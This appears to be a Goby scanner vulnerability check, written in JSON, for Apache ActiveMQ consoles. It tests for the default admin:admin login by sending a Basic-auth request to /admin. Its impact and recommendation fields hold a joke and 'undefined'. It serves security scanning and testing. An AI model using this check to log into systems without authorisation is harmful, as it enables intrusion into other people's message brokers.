{ "Name": "Apache ActiveMQ_Console Weak Password", "Level": "2", "Tags": [ "弱口令" ], "GobyQuery": "app=\"Apache-ActiveMQ\"", "Description": "Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用", "Product": "Apache ActiveMQ", "Homepage": "http://activemq.apache.org/", "Author": "PeiQi", "Impact": "

咩咩咩🐑

", "Recommandation": "

undefined

", "References": [ "http://wiki.peiqi.tech" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/admin", "follow_redirect": true, "header": { "Authorization": "Basic YWRtaW46YWRtaW4=" }, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Version", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-01-21 22:11:54", "GobyVersion": "1.8.230" }